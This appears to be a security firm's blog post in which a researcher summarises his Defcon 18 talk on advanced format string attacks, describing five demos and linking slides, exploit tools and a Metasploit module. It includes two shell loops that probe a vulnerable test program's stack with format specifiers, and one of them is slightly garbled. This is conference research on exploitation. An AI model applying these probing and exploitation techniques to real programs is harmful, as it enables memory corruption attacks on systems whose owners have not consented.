Talk to a Security Expert Now: (800) 721-9177

Defcon: Advanced Format String Attacks

Congratulations to those that survived the giant hangover that was Defcon 18, my presentation on Advanced Format String Attacks and especially the post Q&A and Mario Kart. My presentation was a continuation of my previous Automatic Format String Exploitation research, and I have updated the materials from the presentation here: defcon-18-paul_haas-advanced_format_string_attacks_final.pdf. I have also uploaded the demos from my talk, sans voice:

Demo 1: Attacking a program vulnerable (Makefile) to a format string attack, we dump the stack of the program until we find our passed format string using the following code:
for i in {001..200}; do echo -n "offset $i (%$i$08x) = "; ./printf "%$i$08x" | python -c "import sys, struct; s=int(sys.stdin.read(),16); print '0x%08x: %s' % (s,repr(struct.pack('L',s)))"; done

Demo 2: Finding the address of our format string. This combined with the stack offset found in the previous step lets us associate any data on the stack with its address using the following code:
or i in {1..100}; do ./printf "offset $i = %$i$p:%$i$s"; echo; done | grep -v ^$

Demo 3: Video of our technique demonstrated in our previous POC tool automatically exploiting a program vulnerable to a format string attack by locating the stack offset and address of our exploit and overwriting a known return location.

Demo 4: Automatically exploiting a program vulnerable to a format string attack by locating the stack offset and address of our exploit and brute forcing address on the stack for a valid return location. This includes both a Python and Ruby implementation.

Demo 5: Metasploit demonstration of a remote server vulnerable to a format string attack exploited automatically by locating the stack offset and address of our exploit and brute forcing address on the stack for a valid return location. The Metasploit module and vulnerable server are available for download.

All of the above plus additional documentation can be downloaded in a single archive here: DEFCON-18-Haas-Adv-Format-String-Attacks.tar.bz2

Leave a Reply

Your email address will not be published. Required fields are marked *